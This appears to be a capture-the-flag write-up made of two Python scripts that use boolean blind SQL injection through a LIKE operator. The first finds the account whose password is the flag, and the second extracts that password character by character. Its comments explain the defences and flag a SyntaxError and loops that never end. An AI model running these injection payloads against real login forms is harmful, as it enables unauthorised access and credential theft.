#!/usr/bin/env python3
# Scans the usernames listed in the local "users" file against the challenge
# login form and reports the first account whose stored password matches the
# pattern FLAG{...}.
#
# Each request carries a crafted 'passwd' value that closes the quoted SQL
# string and appends "or passwd like 'FLAG{%}'", so the login query succeeds
# for the right account without knowing the real password. The response body
# is then checked for the "Login failed" marker; its absence is treated as a
# successful login, i.e. the page acts as a boolean oracle.
#
# Defensive reading: this works only because the handler builds its SQL by
# string concatenation and returns a distinguishable failure string.
# Parameterised queries remove the injection; a uniform response for every
# failed login removes the oracle; and a burst of failed logins across many
# distinct usernames from one source is an easy signal to alert on.
import requests
import sys
# NOTE: the file handle is never closed, and a trailing newline leaves an empty
# last entry that is posted as a username like any other.
f = open("users").read().split("\n")
while(1):
    for user in f:
        # Target host is taken from argv[1]; the field names mirror the login form.
        data = {'username':user,'passwd':"""1' or passwd like 'FLAG{%}'""", 'login':'Login'}
        if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text:
            print("[+] USER WITH FLAG = ",user)
            # `break` leaves only the inner for loop; the outer while(1) restarts
            # the scan, so the script does not terminate on its own.
            break
Well, Guillaume is our target; now we are going to get his password (the flag):
#!/usr/bin/env python3
# Recovers Guillaume's password (the flag) one character at a time through the
# same LIKE-based boolean oracle used for the user scan.
#
# Starting from the known prefix 'FLAG{', each candidate character is appended
# and sent as "... or passwd like '<prefix><c>%'". A response without
# "Login failed" means the extended prefix still matches, so the character is
# kept. The alphabet lists upper case before lower case; presumably LIKE is
# case-insensitive here, so the upper-case candidate wins and the final output
# is .upper()'d to compensate — TODO confirm against the challenge's collation.
#
# Defensive reading: each recovered character costs up to 62 requests, so a
# full extraction (32 characters as hard-coded below) appears as roughly two
# thousand failed logins for a single username from one source — a cheap
# detection signal. The underlying fixes are the same as for the user scan:
# parameterised queries and a uniform failure response.
import requests
import sys
flag = 'FLAG{'
while(1):
    for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" :
        data = {'username':"Guillaume",'passwd':"""1' or passwd like '"""+flag+i+"""%""",'login':'Login'}
        if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text:
            flag+=i
            print(flag)
        # Stop once 37 characters are held (the flag length before the closing
        # brace, as hard-coded here).
        if (len(flag)==37):
            # As written this line is a SyntaxError: the string literal is
            # immediately followed by the name `flag` with no operator between.
            print ("[+] FLAG : "flag.upper()+"}")
            # `break` leaves only the inner for loop; the outer while(1) restarts it.
            break
As you can see, I use the SQL LIKE operator to detect when a guessed prefix of the flag is correct.
This technique lets us recover the flag one character at a time.